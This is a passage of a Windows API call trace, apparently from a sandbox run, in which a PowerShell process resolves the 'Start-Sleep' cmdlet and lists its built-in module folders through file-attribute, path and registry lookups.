"c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFilePart=0x0) returned 0x36 [0225.833] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0225.833] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.833] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.834] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.838] CoTaskMemAlloc (cb=0x20e) returned 0x602e90 [0225.839] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x602e90, nSize=0x105 | out: lpBuffer="") returned 0x97 [0225.839] CoTaskMemFree (pv=0x602e90) [0225.839] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fe708 | out: phkResult=0x1b7fe708*=0x680) returned 0x0 [0225.839] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe758, lpData=0x0, lpcbData=0x1b7fe750*=0x0 | out: lpType=0x1b7fe758*=0x1, lpData=0x0, lpcbData=0x1b7fe750*=0x56) returned 0x0 [0225.839] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b7fe758, lpData=0x242adc8, lpcbData=0x1b7fe750*=0x56 | out: lpType=0x1b7fe758*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b7fe750*=0x56) returned 0x0 [0225.839] RegCloseKey (hKey=0x680) returned 0x0 [0225.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fe2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0225.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe720) returned 1 [0225.893] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe800 | out: lpFileInformation=0x1b7fe800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0225.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe6e0) returned 1 [0225.895] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0225.906] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fe2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0225.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe720) returned 1 [0225.906] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe800 | out: lpFileInformation=0x1b7fe800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe6e0) returned 1 [0225.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fe2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0225.907] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe720) returned 1 [0225.907] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe800 | out: lpFileInformation=0x1b7fe800*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0225.907] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe6e0) returned 1 [0225.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe6a0) returned 1 [0225.984] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fe190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0225.984] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7fe130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0225.985] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b7fe340 | out: lpFindFileData=0x1b7fe340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0225.986] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0225.986] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0225.987] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0225.988] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0225.989] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa36040a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa36040a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa386669, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa386669, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMAgent", cAlternateFileName="")) returned 1 [0225.990] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MsDtc", cAlternateFileName="")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetAdapter", cAlternateFileName="NETADA~1")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa4b7931, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa4b7931, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetConnection", cAlternateFileName="NETCON~1")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetEventPacketCapture", cAlternateFileName="NETEVE~1")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, 